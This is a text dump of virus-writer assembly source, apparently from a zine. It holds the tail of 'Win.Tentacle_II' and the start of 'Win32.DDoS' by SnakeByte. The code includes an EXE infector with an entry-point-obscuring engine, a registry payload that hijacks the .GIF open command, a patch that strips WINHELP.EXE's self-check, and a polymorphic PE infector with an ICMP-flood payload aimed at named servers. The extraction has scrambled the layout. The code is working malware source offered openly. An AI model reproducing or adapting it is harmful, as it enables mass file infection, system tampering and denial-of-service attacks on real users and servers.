eax,eax ; EAX=0 ax,word ptr [bp.rw_buffer+22h] ; segment table offset ; (relative to NE header) eax,[bp.new_header_offs]; EAX=segment table offset (relative ; to file start) ecx,ecx ; ECX=0 cx,word ptr [bp.rw_buffer+16h] ; entry code segment index cx ; make segment counter start at zero ecx,3 ; multiply with 8 (segment table ; entry size) eax,ecx ; EAX=offset of entry code segment ; descriptor (from filestart) eax ; CX:DX=EAX

ax,4200h

; go to descriptor of entry code segm

pop pop JC mov

dx ; restore DX (API function ordinal) ax ; restore AX (module index) end_EPO cl,byte ptr [bp.rw_buffer+32h] ; CL=alignemt shift

push sub mov

bp ; save BP (main data stack frame) sp,size EPO_stack_frame ; create new data buffer on stack bp,sp ; and set BP to it

push mov mov

cx [bp.module_index],ax [bp.API_ordinal],dx

mov mov lea int 21h pop JC xor mov shl xor mov add mov push pop dx pop cx mov int 21h

; save CX (alignemt shift) ; save module index ; save API function ordinal

ah,3Fh ; read entry code segment descriptor cx,8 ; size of a segment descriptor dx,[bp.entry_CS_offset] ; DS:DX=pointer to read buffer cx EPO_failed

; restore CX (alignment shift)

edx,edx ; dx,[bp.entry_CS_offset] ; edx,cl ; eax,eax ; ax,[bp.entry_CS_phys] ; edx,eax ; [bp.entry_CS_relocs],edx;

EDX=0 EDX=segment file offset (aligned) EDX=segment file offset (in bytes) EAX=0 EAX=segment physical size EDX=file offset of segment relocs save it

edx

; CX:DX=EDX

ax,4200h

; go to entry code segment relocations

JC mov mov lea int 21h JC xor JMP

EPO_failed ah,3Fh cx,2 dx,[bp.relocs_number]

; read number of relocation items ; read one word ; DS:DX=pointer to read buffer

EPO_failed ecx,ecx ; ECX=0 check_if_all_relocs_done

search_API_reference_loop: push cx mov mov lea int

ah,3Fh cx,8 dx,[bp.reloc_type] 21h

pop cx JC

EPO_failed

; save CX ; read a relocation item ; size of relocation item ; DS:DX=ptr to read buffer

mov

eax,dword ptr [bp.module_index] ; EAX=module index and ; API ordinal cmp [bp.reloc_what],eax JNE check_next_reloc cmp word ptr [bp.reloc_type],103h ; check relocation type: must ; be 32bit far ptr and API ordinal JE found_API_reference check_next_reloc: inc cx check_if_all_relocs_done: cmp cx,[bp.relocs_number] JNE search_API_reference_loop JMP EPO_failed found_API_reference: mov edx,[bp.entry_CS_relocs] add edx,2 shl ecx,3 ; ECX=ECX*8 (size of a reloc item) add edx,ecx ; EDX=offset of reloc item in file mov eax,dword ptr [bp.module_index]; EAX=module index/API ordinal add pop clc JMP EPO_failed: add pop bp stc

sp,size EPO_stack_frame ; clear buffer from stack bp ; restore old stack frame pointer ; clear carry flag (indicate success) end_EPO

sp,size EPO_stack_frame ; clear buffer from stack ; set carry flag (indicate error)

end_EPO: RET

gif_body: include gif.inc gif_body_size

; the body of the gif file converted ; to DB instructions EQU ($ - offset gif_body)

shell_open_command l_shell_open_command

db "\SHELL\OPEN\COMMAND", 0 EQU ($ - offset shell_open_command)

; ----- PAYLOAD ------------------------------------------------------------payload:

;*

push push

es bp

sub mov

sp,size payload_stack_frame ; reserve room on stack bp,sp ; setup new stack frame

push

ax

; save AX (what to do flag)

push db

dword ptr 1 66h,68h,1,0,0,0

; HKEY_CURRENT_USER ; fixup - byte match

mov mov push lea

word ptr [bp.reg_buffer2],"G."; name of the subkey: ".GIF",0 dword ptr [bp.reg_buffer2+2],"FI" ss ; push a far pointer to the name ax,[bp.reg_buffer2] ; of the subkey

push

; save ES ; save BP (main stack frame pointer)

ax push lea

push

ss ax,[bp.reg_buffer1]

; push a far pointer to the buffer ; that will hold the return string

ax mov push lea push

[bp.size_reg_buffer],40h; ss ; ax,[bp.size_reg_buffer] ; ax ;

size of buffer for return string push a far pointer to the dword that holds the size for the return string

CALL

cs:RegQueryValue

; far call to the RegQueryValue API

or JZ pop JMP

ax,ax RegQueryValue_success ax exit_payload

; zero means success ; clear stack

RegQueryValue_success: cmp byte ptr [bp.reg_buffer1],0; has it returned an empty string? JE try_shell_open_command push pop es lea cld xor mov repne dec push push pop ds mov CALL

ss

; ES=SS

di,[bp.reg_buffer1] al,al cx,0FFFFh scasb di

; ; ; ; ; ;

ds cs

; save DS ; DS=CS

DI=offset retrun string clear direction flag AL=0 CX=maximal word search for the end of the string DI points now to the terminating 0

si,offset shell_open_command decrypt_path ; decrypt & append it to the result ; of the RegQueryValue call

pop CALL or pop JZ

ds call_RegQueryValue ax,ax ax RegQueryValue_success2

; restore DS ; zero means success ; restore AX (entry flag)

try_shell_open_command: mov word ptr [bp.reg_buffer1],"G." mov dword ptr [bp.reg_buffer1+2],"FI" push

ds

; save DS

push pop ds

cs

; DS=CS

push pop es

ss

; ES=SS

mov lea mov CALL pop CALL or pop ax JNZ

si,offset shell_open_command di,[bp.reg_buffer1+4] ; Load effective addr cx,l_shell_open_command ; useless, the decrypt_path procedure ; gets the string length itself. decrypt_path ds ; restore DS call_RegQueryValue ax,ax ; zero means success exit_payload

RegQueryValue_success2: ; reg_buffer2 contains now the commandline of the program that is ; runned whenever the user doubleclics on a .GIF file or JZ push pop es lea push xor mov repne dec mov pop sub mov mov

ax,ax ; check the entry flag in AX restore_gif_commandline ss

; ES=SS

di,[bp.reg_buffer2]

; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

di al,al cx,0FFFFh scasb di ax,di di ax,di cx,ax al,"%"

cld repne scasb JNZ exit_payload cmp byte ptr [di],"1" JNE exit_payload cmp byte ptr [di-2],'"' JNE dont_skip_quotes dec di dont_skip_quotes: dec di

DI=pointer to commandline connected with .GIF files save DI AL=0 CX=maximal word search for the end of the string DI points now to the terminating 0 AX=end of string restore DI (start of string) AX=length of string CX=length of string search the commandline for where the name of the gif will be on program start clear direction flag search for the % sign if not found, exit payload is it the %1, like it has to be? if not, something is wrong is there the quotes sign?

; if yes, skip it ; go to the start of the first ; parameter in the commandline, the

; name of the .GIF file mov dword ptr [di+9],"G.EL" mov byte ptr [di],"C" mov dword ptr [di+5],7E00FD39h mov dword ptr [di+0Dh],"FI" add dword ptr [di+5],0C5405715h mov dword ptr [di+1],"ET\:" push di CALL call_RegSetValue

; create there the "C:\TENTACLE.GIF" ; string

; save DI (offs of "C:\TENTACLE.GIF") ; set the new value.

; from now on, everytimes the user doubleclicks on a gif file, it ; will only see C:\TENTACLE.GIF ;-) mov mov pop int 21h JC

ah,3Ch cx,7 dx

; ; ; ;

create C:\TENTACLE.GIF file readonly,hidden,system attributes DS:DX=ptr to filename to create ("C:\TENTACLE.GIF")

exit_payload

mov

bx,ax

; handle to BX

mov mov mov

word ptr [bp.reg_buffer2+2],"8F" word ptr [bp.reg_buffer2+0],"IG" word ptr [bp.reg_buffer2+4],"a7"

; create GIF marker in the ; buffer ("GIF87a")

mov mov lea int 21h

ah,40h cx,6 dx,[bp.reg_buffer2]

; write GIF marker ; size of gif marker ; DS:DX=pointer to write buffer

mov mov mov push push pop ds int 21h

ah,40h cx,gif_body_size dx,offset gif_body ds cs

; ; ; ; ;

ds

; restore DS

ah,3Eh

; close file

exit_payload

; payload is done

pop mov int 21h JMP

restore_gif_commandline: push ss pop es lea di,[bp.reg_buffer2] cld push xor mov repne dec mov pop sub add di,ax mov

write gif file body size to write DS:DX=pointer to write buffer save DS DS=CS

; ES=SS

di al,al cx,0FFFFh scasb di ax,di di ax,di

; ; ; ; ; ; ; ; ; ; ;

DI=pointer to commandline connected with .GIF files clear direction flag save DI AL=0 CX=maximal word search for the end of the string DI points now to the terminating 0 AX=end of string restore DI (start of string) AX=length of string

cx,ax

; CX=length of string

mov std repne JNZ add cmp JNE cmp JNE mov mov CALL exit_payload: add pop pop RET

al," "

; ; scasb ; exit_payload ; di,2 ; byte ptr [di],"C" ; exit_payload ; dword ptr [di+1],"ET\:" ; exit_payload byte ptr [di],"%" ; word ptr [di+1],"1" call_RegSetValue ;

push

restore the correct cmdline "%1" set it.

sp,size payload_stack_frame ; free room on stack bp ; restore BP (main stack frame ptr) es ; restore ES

call_RegQueryValue: ;* push dword ptr 1 db 66h,68h,1,0,0,0 push lea

search for the blank set direction flag search for the end of the filename if not found, exit go to 1st param (file to display) is there "C:\TENTACLE.GIF" if not, there's nothing to restore make really sure

; HKEY_CURRENT_USER ; fixup - byte match

ss ax,[bp.reg_buffer1]

; push a far pointer to the name ; of the subkey

ss ax,[bp.reg_buffer2]

; push a far pointer to the buffer ; that will hold the return string

ax push lea

push

ax mov push lea push

[bp.size_reg_buffer],40h; ss ; ax,[bp.size_reg_buffer] ; ax ;

CALL

cs:RegQueryValue

size of buffer for return string push a far pointer to the dword that holds the size for the return string

; far call to the RegQueryValue API

RET

call_RegSetValue: ;* push dword ptr 1 db 66h,68h,1,0,0,0 push lea

ss ax,[bp.reg_buffer1]

; push a far pointer to the name ; of the subkey

push db

dword ptr 0 66h,68h,1,0,0,0

; REG_SZ (ASCIIZ string) ; fixup - byte match

push lea

ss ax,[bp.reg_buffer2]

; push a far pointer to the buffer ; that will hold the return string

push db

dword ptr 0 66h,68h,0,0,0,0

; size of value data ; fixup - byte match

CALL

cs:RegSetValue

; far call to the RegSetValue API

push ;*

ax

push ;*

; HKEY_CURRENT_USER ; fixup - byte match

ax

RET

; ----- PATCH WINHELP ------------------------------------------------------patch_winhelp: cmp JB

;*

;*

word ptr [bp.rw_buffer+1Ch],2 exit_patch_winhelp

; number of segments ; it's not the WINHELP.EXE ; we know, don't patch it

xor mov

eax,eax ax,word ptr [bp.rw_buffer+22h]

add add db

eax,[bp.new_header_offs] eax,8 66h, 83h,0C0h, 08h

; ; ; ; ; ;

EAX=0 offset of segment table (relative to NE header) now relative to file start go to 2nd segment descriptor fixup - byte match

push pop dx pop cx mov int

eax

; CX:DX=EAX

ax,4200h 21h

; set filepointer to the ; descriptor.

mov mov lea int 21h

ah,3Fh cx,2 dx,[bp.tmp_buffer]

; read the aligned segment file offset ; read one word ; DS:DX=pointer to read buffer

xor mov mov shl add db

eax,eax ; EAX=0 ax,word ptr [bp.tmp_buffer] ; EAX=aligned segment file offset cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift eax,cl ; EAX=segment file offset in bytes eax,22h ; go to offset 22h in 2nd segment 66h,83h,0C0h,22h ; fixup - byte match

push pop dx pop cx mov int JC

eax

; CX:DX=EAX

ax,4200h 21h exit_patch_winhelp

; set filepointer to offset 22h in ; the second segment

mov mov lea int 21h JC

ah,3Fh cx,2 dx,[bp.tmp_buffer]

; read two bytes of program code ; size to read ; DS:DX=pointer to read buffer

exit_patch_winhelp

cmp JNE

word ptr [bp.tmp_buffer],1474h ; is it a JE $+16h ? exit_patch_winhelp ; if not, it's not the WINHELP.EXE ; we know, don't patch it.

mov

ax,4201h

mov mov int 21h

cx,-1 dx,-2

; set filepointer back to the ; conditional jmp ; CX:DX=-2

mov

byte ptr [bp.tmp_buffer],0EBh

mov

ah,40h

mov lea

cx,1 dx,[bp.tmp_buffer]

; ; ; ;

; a unconditional JMP SHORT

patch the file with the unconditional JMP write one byte DS:DX=pointer to the write buffer

int 21h ; WINHELP.EXE now has no self-check ; any more ;-) exit_patch_winhelp: RET

db

RegQueryValue RegSetValue org_entry

3 dup(0)

dd dd dd

; maybe the author wanted the ; relocation addresses on an address ; divisible by 4 ? 0000FFFFh 0000FFFFh 0000FFFFh

virus_end: ; Most data of the virus is stored in a buffer on the stack. The following ; structure represents the lay-out of this stack frame: stack_frame dta tmp_buffer bytes_to_copy full_filename full_filespec tmp_filename source_handle dest_handle file_date file_time file_size new_header_offs end_of_NE_hdr alignment_unit first_segm_offs new_sect_descr rw_buffer our_reloc_offs module_ordinal new_entry_CS new_entry_IP stack_frame

struc db 2Bh dup(?) db 10 dup(?) dd ? db 24 dup(?) db 24 dup(?) db 16 dup(?) dw ? dw ? dw ? dw ? dd ? dd ? dd ? dd ? dd ? dw 4 dup(?) db 64 dup(?) dw ? dd ? dd ? dw ? dw ? ends

; The data that is used in the EPO engine of the virus uses another stack ; frame that is represented in this structure: EPO_stack_frame entry_CS_offset entry_CS_phys entry_CS_flags entry_CS_virt reloc_type reloc_offs reloc_what module_index API_ordinal entry_CS_relocs relocs_number

struc dw ? dw ? dw ? dw ? dw ? dw ? dd ? dw ? dw ? dd ? dw ?

EPO_stack_frame ends

; Also the payload routine uses its own stack frame: payload_stack_frame struc reg_buffer1 db 40h dup(?) reg_buffer2 db 40h dup(?) size_reg_buffer dd ? payload_stack_frame ends

first_gen_entry: push ds pusha push pop ds

; save DS ; save all registers

ss

; DS=SS

sub mov

sp,size stack_frame bp,sp

; reserve room on stack ; setup stack frame

mov lea int

ah,1Ah dx,[bp.dta] 21h

; set DTA to DS:DX ; Load effective addr

mov call mov call

si, offset exe_wildcard ; encrypt all the strings in the encrypt_wildcard ; virus by a simple inc/dec si, offset scr_wildcard ; algorithm encrypt_wildcard

mov call mov call mov call mov call mov call mov call

si, offset C_win encrypt_path si, offset C_windows encrypt_path si, offset C_win31 encrypt_path si, offset C_win311 encrypt_path si, offset C_win95 encrypt_path si, offset shell_open_command encrypt_path

mov mov mov CALL

bx,0FFFFh cx,offset empty_string dx,offset exe_wildcard infect_directory

mov mov int

ah,9 dx,offset first_gen_message 21h

mov int

ax,4C00h 21h

; infect all EXE files in current dir

first_gen_message db "Win.Tentacle_II virus dropped", 0Dh, 0Ah, "$" end first_gen_entry

; ; *************************************************************************** ; -----------------[ Win32.DDoS by SnakeByte { KryptoCrew } ]---------------; *************************************************************************** ; ; ; ; Please note that it is illegal to spread viruses, so if you compile this ; code, just test it on a closed system and don't place it in the wild ! ; I am not responsible for your actions .. as always ;) ; ; ; ; ; This is the first Windows Virus I've written so far, and some parts are from ; Win32.Aztec by Billy Beleceb, because at the time i wrote this thing, not everything ; was clear in my mind, as it is now, hope I can present you some better things from me ; in the future. ; ; This is also my first polymorphic virus ever ;) so don't expect too much from the ; poly engine. I did not understand much of the code from other poly engines, but ; now, after coding one on my own, I do, so I maybe can code a better one the next time ;) ; ; The first layer is nearly completely polymorphic. I use junk opcodes like mov, add ... ; and try to keep track that they don't look completely useless. ; I also use several ways to decrypt the virus ( xor, neg, not .. ) and ; several methods to do the loop. The size will always be in ECX and ; the start in ESI, but i use several methods to put the values inside ; the registers so there is nothing static. ; The only static thing left is the call to the polymorphic decryptor ;( ; ; ; I was just able to test this thing on a Win95 PC, so I don't know if it will ; work on other systems, but I think it will. Two friends made some tests under ; NT and 2k with a beta, and it worked, so I hope this final version will also do. ; ; ; It tries to get the 4 following API's: ; ; - Kernel32.dll <- the only one we really need to work, the others are for fun ; ; - Imagehlp.dll <- try to create a valid CRC for the PE-Header of infected files ; - Advapi32.dll <- get some data from the registry ; - Winsck32.dll <- Payload : Ping-flood a server ; ; ; ; ; What does this Virus do : ; ; - 1.st Generation infects just the current directory ( easier to infect just some files *eg* ) ; - Get's API's with LoadLibraryA & GetProcAddress ; - Tries to load ImageHlp.dll to create checksums with the CheckSumMappedFile Function ; - Infects the current, the windows and the system directory and parses some ; random directory's on drive C: ; - Follows LNK - Files ( does not work with NT / 2k ) ; - Removes and restores File-Attributes ; - Parses Drive C:, enters a folder with a chance of 1 to 3 ; - Retrieves the Startmenue from registry and parses it ( follows LNK-Files there ) ; - If everything runs well it will infect 100 files all over the disk ; - Generates a polymorph decryptor which will be used for all files infected in one run ; - Uses 2 layers of decryption ( 1st is poly, 2nd is harder to debug / emulate )

; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

- Does not infect files smaller than 40 kb - Will not infect files with AV, AN or DR in the filename - Payload is a icmp flood on one of these servers : Sunday Monday Tuesday Wednesday Thursday Friday Saturday *# *#

= = = = = = =

www.bundesnachrichtendienst.de French Secret Service ( dgse.citeweb.net ) www.avp.com ( AV ) www.lockdown2000.com www.f-secure.com www.norton.com www.zonelabs.com

Please note that i choose these servers because I think they can handle such an attack, if any idiot would release this into the wild.

#* #*

To make this code working use TASM 5.0 and pewrsec.

Thanks and greetz fly to these people: Billy Beleceb

-

Evul Ciatrix SnakeMan PhilippP BumbleBee diediedie asmodeus darkman

-

Your Win32 VWG is just great .. ( you'll find some of your code [Win32.Aztec] here ;) Thanks for hosting my site at coderz.net Hope you carry on your good work with VDAT ! Hope you get more entrys *g* --> http://altavirus.cjb.net Thanks for the thrilling test in 2k .. ;) Still thinking of Sex ? Thnx for demotivating me... :) nice beginner lesson in poly ;) just believe me: the question was stupid ;)

*************************************************************************** ---------------------------[ Here we start ]------------------------------***************************************************************************

.586p .model flat jumps .radix 16

extrn ExitProcess:PROC extrn MessageBoxA:PROC

; ; ; ; ;

Jumps get calculated ( I know not good for optimizing.. ) All numbers are Hexadecimal I once searched for a forgotten 'h' 2 weeks until I found this bug.. :P

; some API's ; fake host for 1. Generation ; For testing purposes ( no longer needed ) ; but i needed it for error-detection *g* ; 'cause I am too stupid to work with softice.. :(

.data db ?

VirusSize CryptSize NoCrypt FirstLSize Buffersize

; ; ; ; ; ;

equ equ equ equ equ

(offset (offset (offset (offset (offset

FILETIME FT_dwLowDateTime FT_dwHighDateTime FILETIME

fake data for TASM otherwise TASM would not compile this we store all our data in the code section, that's why we need to use pewrsec after compiling, to set the code section flags to write !

; some constants I don't want to calculate on my own *g* VirusEnd - offset Virus ) VirusEnd - offset CryptStart ) CryptStart - offset Virus ) VirusEnd - offset FirstLayerStart ) EndBufferData - offset VirusEnd ) STRUC dd dd ENDS

? ?

.code ; *************************************************************************** ; -------------[ Delta Offset and searching for the Kernel Addy ]-----------; ***************************************************************************

Virus: call PDecrypt

FirstLayerStart:

call Delta Delta: mov ebp, offset Delta neg ebp pop eax add ebp, eax or ebp, ebp jz CryptStart

; Here we go ; call the poly decryption routine ; which is located at the end of virus ; just a simple 'ret' in the first generation ; here starts the first layer ; everything will be crypted from here on ; let's get the delta - offset

; I want to do this a bit different ; than usual, who knows, maybe this ; fools some bad heuristics

; we don't need to decrypt the 1. ; Generation

; save esp mov dword ptr [ebp+XESP], esp

mov ecx, (CryptSize / 2) ; the lenght of crypted part in words mov dx, word ptr [ebp+Key] lea esp, [ebp+CryptStart] ; set esp to the start of the decrypted part DeCryptLoop: pop ax inc dx xchg dl, dh xchg al, ah xor ax, dx not ax push ax add esp, 2h

; ; ; ;

let's decrypt the virus we pop the body word by word this method fucks with debuggers, who trace with int 1h ( destroys stack )

loop DeCryptLoop ; restore esp mov esp, dword ptr [ebp+XESP] jmp CryptStart

; start virus

Key XESP

; our key ; we save the esp here

dw 0h dd 0h

db 4 dup (90h)

; some nop's so we will not jump into a instruction ; ( happened sometimes during testing :( ) ; because of the prefech queue buffer ( or whatever this is

spelled .. ) CryptStart:

mov mov mov mov

; we save these two values ( EIP & Imagebase ) ; to be able to return to the original host.. eax, dword ptr [ebp+OldEIP] dword ptr [ebp+retEIP], eax eax, dword ptr [ebp+OldBase] dword ptr [ebp+retBas], eax

mov eax, dword ptr fs:[0] ; save the original SEH mov dword ptr [ebp+SEH_Save], eax mov esi, [esp] xor si, si

; let's get the return address of the Create Process API ; round it to a full page

push dword ptr [ebp+Error_ExecuteHost] mov fs:[0], esp ; set new SEH call GetKernel jnc GetApis

; try to get it ; If got it we try to retrieve the API's ; ; ; ;

Otherwise, we try to check for the kernel at some fixed addresses But the way above should work most of the times.. :)

mov esi, 0BFF70000h call GetKernel jnc GetApis

; try the Win95 Kernel Addy

mov esi, 077F00000h call GetKernel jnc GetApis

; try the WinNT Kernel Addy

mov esi, 077e00000h call GetKernel jnc GetApis

; try the Win2k Kernel Addy

jmp Error_ExecuteHost

; if we still did not found the ; kernel we stop the virus ; and execute the goat

; *************************************************************************** ; -------------------------[ let's get the API's ]--------------------------; ***************************************************************************

; ; ; ;

These are the 2 API's we search in the Kernel we need them to get all the others API's I prefer LoadLibraryA to GetModuleHandle, because it is no longer nessecairy, that the

; ; ; ; ;

file we infect loads the dll files we need, we load them on our own,... ;) This means, we can use almost any API we want to *eg* LoadLibraryA also returns the Module-Handle, but if it is not loaded it loads it ... bla.. ;P

LL db 'LoadLibraryA', 0h ; we need these API's for searching.. GPA db 'GetProcAddress', 0h GetApis:

; Offset of the Kernel32.dll PE-Header is in EAX

mov [ebp+KernelAddy], eax ; Save it mov [ebp+MZAddy], ebx lea edx, [ebp+LL] ; Points to name of the LoadLibaryA - API mov ecx, 0Ch ; Lenght of Name call SearchAPI1 ; search it.. mov [ebp+XLoadLibraryA], eax ; Save the Addy xchg eax, ecx jecxz ExecuteHost

; If we didn't get this API or the other one, we quit ! ; thnx to Billy ;)

lea edx, [ebp+GPA] ; Points to name of the GetProcAddress - API mov ecx, 0Eh ; Lenght of Name call SearchAPI1 mov [ebp+XGetProcAddress], eax ; Save the Addy xchg eax, ecx jecxz ExecuteHost

jmp GetAPI2

KERNEL32

; check if we failed ; ( thnx again, nice way of optimization *g* ) ; ; ; ; ;

Now we have our and are able to Yes I know this But storing the my code *bg*

2 nessecairy API's get the others jmp is not very optimizing.. ;) data here helps me understanding

; this dll is delivered with every version db 'Kernel32',0 ; of windows, so we will get it always ( ..most likely *g* ) ; the virus relies on it

IMAGEHLP

db 'Imagehlp',0 ; ; ; ;

ADVAPI

db 'advapi32',0 ; this dll is neccessairy to retrieve the startmenue folder ; from registry, so we are able to follow the shortcuts there

WSOCK

db 'wsock32.dll',0 ; we need this one here to perform a ping ; ( not needed for the virus, but the payload )

GetAPI2:

this dll is not nessecairily needed, but dll's will only get infected, if we are able to use the CheckSumMappedFile Function from this dll to create a checksum it is delivered with win9x, NT and several compilers.

; We get them, by grabbing the handles of ; different DLL's first and use GetProcAddress ; to locate the API's itself ; ; ; ; ;

Let's get the Handles by calling the LoadLibrary API.. :) if we fail to get the Kernel32, we execute the original host

lea eax, [ebp+KERNEL32] push eax call dword ptr [ebp+XLoadLibraryA] mov [ebp+K32Handle], eax test eax, eax jz ExecuteHost lea eax, [ebp+IMAGEHLP] push eax call dword ptr [ebp+XLoadLibraryA] mov [ebp+IHLHandle], eax lea eax, [ebp+ADVAPI] push eax call dword ptr [ebp+XLoadLibraryA] mov [ebp+ADVHandle], eax lea eax, [ebp+WSOCK] push eax call dword ptr [ebp+XLoadLibraryA] mov [ebp+W32Handle], eax

lea esi, [ebp+Kernel32Names] lea edi, [ebp+XFindFirstFileA] mov ebx, [ebp+K32Handle] push NumberOfKernel32APIS pop ecx call GetAPI3 lea esi, [ebp+ImageHLPNames] lea edi, [ebp+XCheckSumMappedFile] mov ebx, [ebp+IHLHandle] xor ecx, ecx inc ecx call GetAPI3 lea esi, [ebp+ADVAPI32Names] lea edi, [ebp+XRegOpenKeyExA] mov ebx, [ebp+ADVHandle] push 3d pop ecx call GetAPI3

lea esi, [ebp+WSOCK32Names] lea edi, [ebp+Xsocket] mov ebx, [ebp+W32Handle] push 3d pop ecx call GetAPI3

; *************************************************************************** ; ------------------[ Outbreak ! Here we start infecting ]------------------; *************************************************************************** ; ; ; ; ;

Now we got everything we need to start infecting some files *eg* First of all we retrieve the foldernames of the current folder, the system folder, and the windows folder

; these are the folders we start to infect lea edi, [ebp+curdir] push edi push 7Fh call dword ptr [ebp+XGetCurrentDirectoryA]

call genPoly

; before we infect anything, we ; create a poly decryptor used for ; all files we infect = slow poly !

mov [ebp+InfCounter], 10d ; Number of files we want to infect ! call InfectCurDir ; first of all we infect the current directory or ebp, ebp jz ExecuteHost

; ; ; ;

if this is the first generation, we infect just the first directory ( makes it easier to infect just some files .. *g* we also don't start the payload !

push 7Fh

; buffer - size ; 7fh = 127d = max lenght of Directory name ; Pointer to the offset where we save the directory

lea edi, [ebp+windir] push edi call dword ptr [ebp+XGetWindowsDirectoryA]

lea edi, [ebp+windir] ; then we infect the windows directory push edi call dword ptr [ebp+XSetCurrentDirectoryA] mov [ebp+InfCounter], 10d call InfectCurDir ; we save both directory's in the same buffer push 7Fh ; so we save 127 Bytes of the Buffersize lea edi, [ebp+windir] push edi call dword ptr [ebp+XGetSystemDirectoryA] lea edi, [ebp+windir] ; and the system directory .. push edi call dword ptr [ebp+XSetCurrentDirectoryA] mov [ebp+InfCounter], 10d call InfectCurDir ; ; ; ; ;

if everything went fine, we have infected now up to 30 files ! Is this enough ? ( please note that this is a rhetorical question *g* ) We want more !

; *************************************************************************** ; -----------------------[ Parse Directory's ]------------------------------; *************************************************************************** InitParsing: mov [ebp+InfCounter], 30d ; let's parse some directorys for ; 30 more files ! lea edi, [ebp+RootDir] call dword ptr [ebp+XSetCurrentDirectoryA] call ParseFolder

; if we are not able to access the registry we ; infect another 20 Files in the System-Directory cmp dword ptr [ebp+XRegOpenKeyExA], 0h je InfectWinDirAgain call GetStartMenue ; last but not least, we try to parse the ; start-menue folder ( follow the LNK's ) ; to get 20 more files ; with some luck, we infect 100 files each run ; all over the HD *g* ; I think this can be called successfull spreading *g* lea edi, [ebp+windir] call dword ptr [ebp+XSetCurrentDirectoryA] InfectWinDirAgain: mov [ebp+InfCounter], 20d call ParseFolder ; let's parse the startmenue and follow all ; LNK-Files inside ;) jmp PayLoad

ParseFolder: call InfectCurDir cmp [ebp+InfCounter],0 jbe EndParsing lea esi, [ebp+Folders] Call FindFirstFileProc inc eax jz EndParsing dec eax

; start the evil part of this thingie ..

; infect the current directory ; we infected enough ? ok, leave !

; If there are no directorys we return ; otherwise we save the handle

GetOtherDir: ; first of all we check if this ; is a valid directory mov eax, dword ptr [ebp+WFD_dwFileAttributes] and eax, 10h ; if not we get the next jz NoThisOne ; one lea esi, [ebp+WFD_szFileName] cmp byte ptr [esi], '.' ; we will not parse into . or .. je NoThisOne ; directorys push 03h pop ecx call GetRand dec edx jz ParseNewDir

; if division-rest (edx) = 1 ; we get this directory

NoThisOne: call FindNextFileProc test eax, eax jnz GetOtherDir EndParseDir2:

; we close the search - Handle

mov eax, dword ptr [ebp+FindHandle] push eax call dword ptr [ebp+XFindClose]

EndParsing: ret

; we just return

ParseNewDir:

; we got a direcory, let's change to it ; and infect it.. *eg* mov eax, dword ptr [ebp+FindHandle] push eax call dword ptr [ebp+XFindClose] lea esi, [ebp+WFD_szFileName] push esi call dword ptr [ebp+XSetCurrentDirectoryA]

jmp ParseFolder ; *************************************************************************** ; -----------------[ Let's get the Startmenue folder ]----------------------; ***************************************************************************

GetStartMenue:

; Let's try to open HKEY_USERS registry Key

lea esi, [ebp+RegHandle] push esi push 001F0000h ; complete access push 0h ; reserved lea esi, [ebp+SubKey] push esi push 80000003h ; HKEY_USERS call dword ptr [ebp+XRegOpenKeyExA] test eax, eax jnz NoStartMenue

; if we failed opening the key, we return

; let's get the value lea esi, [ebp+BufferSize] push esi lea esi, [ebp+windir] push esi lea esi, [ebp+ValueType] push esi ; Type of Value push 0 ; reserved lea esi, [ebp+Value] push esi ; ValueName mov eax, [ebp+RegHandle] push eax ; Reg-Key Handle call dword ptr [ebp+XRegQueryValueExA] mov eax, dword ptr [ebp+RegHandle] push eax call dword ptr [ebp+XRegCloseKey] NoStartMenue: ret SubKey Value ValueType BufferSize

db db dd dd

'.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0 'Start Menu',0 0h ; Type of registry Value 7Fh ; size of buffer

; *************************************************************************** ; ----------------[ API - Tables and some other data ]----------------------; ***************************************************************************

Folders db '*.',0 RootDir db 'C:\',0

; Misc Data .. ;) ; search for directory's ; we want to start parsing at root of Drive C: ; ; ; ; ; ;

Kernel32Names:

Here follow the tables of the api's we use for our virus, if you want to know what they do exactly simply check the Win32 Programmer's Reference I won't explain them ( I think the names of them makes it clear enough *g* )

; 17d API's we want from Kernel32.dll

NumberOfKernel32APIS equ 17d db db db db db db db db db db db db db db db db db

'FindFirstFileA', 0 'FindNextFileA', 0 'FindClose', 0 'CreateFileA', 0 'SetFileAttributesA', 0 'CloseHandle', 0 'CreateFileMappingA', 0 'MapViewOfFile', 0 'UnmapViewOfFile', 0 'GetWindowsDirectoryA', 0 'GetSystemDirectoryA', 0 'GetCurrentDirectoryA', 0 'SetCurrentDirectoryA', 0 'GetFileAttributesA', 0 'GetTickCount', 0 'CreateThread',0 'GetSystemTime',0

ImageHLPNames: db 'CheckSumMappedFile', 0h ADVAPI32Names: db 'RegOpenKeyExA',0 db 'RegQueryValueExA',0 db 'RegCloseKey',0 WSOCK32Names: db 'socket',0 db 'WSACleanup',0 db 'WSAStartup',0 db 'closesocket',0 db 'sendto',0 db 'setsockopt',0 ; *************************************************************************** ; --------------[ Retrieve API's with GetProcAddress ]----------------------; *************************************************************************** ; ; ; ; GetAPI3: push ecx

esi edi ebx ecx

points to the Table of Names to the offsets contains the module-handle the number of API's

; save ecx

push esi push ebx

; push api-name ; Push Module-Handle ; call GetProcAddress

call dword ptr [ebp+XGetProcAddress] stosd ; store api-offset pop ecx dec ecx jz EndApi3

; did we get them all ?

push ecx

; otherwise move esi to next API-Name

SearchZero: cmp byte ptr [esi], 0h je GotZero inc esi jmp SearchZero GotZero: inc esi pop ecx jmp GetAPI3

; if yes then return

; we search for the end of the current ; api name ( always 0h ) and increase

; get ecx ( counter ) ; retrieve Next API

EndApi3: ret

; *************************************************************************** ; --------------[ Search Kernel Export Table for API's ]--------------------; ***************************************************************************

SearchAPI1:

; In this procedure we search for the first 2 API's ; clear the counter and word ptr [ebp+counter], 0h mov eax, [ebp+KernelAddy] ; Load the PE-Header Offset mov esi, [eax+78h] add esi, [ebp+MZAddy] add esi, 1Ch

; ; ; ;

Get Export Table Address normalize RVA skip not needed data now we gave the Address Table RVA-Offset in esi

